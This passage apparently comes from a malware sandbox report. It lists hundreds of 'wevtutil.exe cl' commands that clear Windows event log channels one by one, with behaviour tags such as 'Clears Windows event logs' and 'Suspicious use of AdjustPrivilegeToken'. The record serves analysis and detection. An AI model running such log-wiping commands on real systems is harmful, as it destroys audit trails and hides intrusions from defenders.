C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
PID:1548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
- Clears Windows event logs
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
- Clears Windows event logs
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
3⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
- Clears Windows event logs
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:1240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:1076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
- Clears Windows event logs
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:1324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
PID:240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
PID:616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
3⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:1284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
- Clears Windows event logs
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
- Clears Windows event logs
PID:1880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:2020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
PID:1656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
- Clears Windows event logs
- Enumerates connected drives
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:1724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
3⤵
- Clears Windows event logs
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
- Clears Windows event logs
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
PID:324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:1688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
PID:1052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
PID:840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
PID:1004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
- Clears Windows event logs
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
- Clears Windows event logs
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
3⤵
PID:1240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:1332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
- Clears Windows event logs
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
3⤵
PID:1896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
PID:1708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
- Enumerates connected drives
PID:1076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
PID:1324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
3⤵
PID:616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
3⤵
- Clears Windows event logs
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
3⤵
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
- Clears Windows event logs
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
- Clears Windows event logs
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
3⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
- Clears Windows event logs
PID:1688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:1052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
- Enumerates connected drives
PID:840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:1004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
- Enumerates connected drives
PID:1240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:1332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:1976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:1896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
3⤵
PID:1708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
- Clears Windows event logs
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:1324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
- Clears Windows event logs
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
- Clears Windows event logs
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
- Clears Windows event logs
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
- Clears Windows event logs
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:1688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
3⤵
PID:1052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
- Clears Windows event logs
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
PID:912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
- Clears Windows event logs
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
- Enumerates connected drives
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
- Enumerates connected drives
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
- Enumerates connected drives
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
3⤵
- Enumerates connected drives
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
- Clears Windows event logs
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
